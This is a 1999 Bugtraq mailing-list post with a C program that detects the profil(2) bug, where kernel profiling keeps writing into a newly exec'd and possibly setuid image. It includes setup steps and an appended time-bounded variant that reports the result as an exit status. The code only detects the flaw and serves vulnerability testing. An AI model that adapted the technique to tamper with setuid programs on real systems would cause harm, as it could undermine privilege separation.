Bugtraq mailing list archives
profil(2) bug, a simple test program
From: ross () GHS COM (Ross Harvey)
Date: Mon, 9 Aug 1999 04:18:36 -0700
This program will check to see if a given system has the profil(2) bug described in NetBSD Security Advisory 1999-011. If it prints `Counting!' then you've got it...

At least one system (Solaris) appears to fix the security issue but doesn't turn off profiling unless the new image is owned by a different user. To check for this, you need to do something like:

    % cc profiltest.c
    % su
    # mv a.out prog.setuid
    # chown (something) prog.setuid
    # (possibly make it setuid)
    # exit
    % ./a.out

If the program doesn't find prog.setuid, it just exec's itself; this gets the same result on most systems. (So: % cc profiltest.c; ./a.out)

So far, I've only found it in BSD systems. Linux hasn't had profiling in the kernel for a while, so current versions should not be vulnerable.

    #include <sys/types.h>
    #include <stdio.h>
    #include <stdlib.h>     /* exit() */
    #include <unistd.h>

    /* profil(2) sample buffer; the exec'd image watches it for writes */
    volatile unsigned short twobins[2];

    int
    main(int ac, char **av)
    {
        if (ac == 1) {
            /* can't check the return value; on some systems it's void.
             * The declared buffer type is char * on the BSDs and
             * unsigned short * on glibc, so pass it as void *. */
            profil((void *)twobins, sizeof twobins, (u_long)&main, 2);
            /* try a different image for uid/setuid tests */
            execl("prog.setuid", "tryroot", "-", (char *)0);
            /* otherwise, just chain to ourself */
            execl(av[0], av[0], "-", (char *)0);
            fprintf(stderr, "problems\n");
            exit(1);
        }
        /* exec'd image: we never called profil(), so any nonzero bin
         * means the kernel is still writing samples into this image */
        for (;;) {
            if (twobins[0] | twobins[1]) {
                printf("Counting!\n");
                twobins[0] = twobins[1] = 0;
            }
        }
    }

    /* ross.harvey () computer org */
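The check described above, as an added example that is not part of Ross Harvey's post: a time-bounded, scriptable variant of the same test. It keeps the original exec logic (try prog.setuid first, otherwise chain to itself) but spins for a fixed number of seconds instead of forever, reports on stderr which image it ended up in and how many profiling ticks landed after exec, and exits 1 if any did, 0 if the buffer stayed quiet, 2 if neither exec worked. SPIN_SECONDS, bins_touched() and run_child() are names chosen for this example; profil()'s declared parameter types differ between glibc and the BSDs, so the buffer is passed as void *, and _DEFAULT_SOURCE is defined so glibc exposes the prototype.

```c
/* Added example (not from the original post): bounded profil(2)-across-exec
 * check with an exit-status verdict. Build, optionally copy the binary to
 * prog.setuid owned by another user as the post describes, then run it with
 * no arguments and look at the exit status. */
#define _DEFAULT_SOURCE 1   /* glibc: declare profil() in <unistd.h> */
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

#define SPIN_SECONDS 5      /* how long the exec'd image watches its bins (assumption) */

volatile unsigned short twobins[2];     /* profil(2) sample buffer */
static volatile sig_atomic_t times_up;  /* set by the SIGALRM handler */

/* bins_touched: has the kernel incremented any of the profiling bins?
 * Kept as a pure helper so the decision logic is testable on its own. */
int bins_touched(const volatile unsigned short *bins, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (bins[i] != 0)
            return 1;
    return 0;
}

static void on_alarm(int sig)
{
    (void)sig;
    times_up = 1;
}

/* run_child: the half that runs after exec. This image never calls
 * profil(), so every tick that lands in twobins leaked across exec.
 * Returns the process exit status: 1 = leaked (vulnerable), 0 = clean. */
int run_child(const char *image_name)
{
    unsigned long ticks = 0;

    signal(SIGALRM, on_alarm);
    alarm(SPIN_SECONDS);
    while (!times_up) {
        if (bins_touched(twobins, 2)) {
            ticks += twobins[0] + twobins[1];
            twobins[0] = twobins[1] = 0;
        }
    }
    /* stderr is unbuffered, so the verdict survives pipes and timeouts */
    fprintf(stderr, "%s: %lu profiling ticks landed after exec -> %s\n",
            image_name, ticks, ticks ? "VULNERABLE" : "ok");
    return ticks ? 1 : 0;
}

int main(int argc, char **argv)
{
    if (argc == 1) {
        /* parent image: arm profiling on the two-bin buffer, then exec.
         * Scale 2 is so coarse that samples near main land in these bins. */
        profil((void *)twobins, sizeof twobins, (unsigned long)&main, 2);
        /* a separately owned image, if the tester prepared one */
        execl("prog.setuid", "tryroot", "-", (char *)0);
        /* otherwise chain to ourself */
        execl(argv[0], argv[0], "-", (char *)0);
        perror("execl");
        return 2;
    }
    /* argv[0] tells us which image we are: "tryroot" or our own name */
    return run_child(argv[0]);
}
```

Because the verdict is an exit status, the check drops straight into a script (`./profiltest; echo $?`), and the argv[0] printed on stderr distinguishes the self-exec case from the differently-owned prog.setuid case that the post says matters on Solaris.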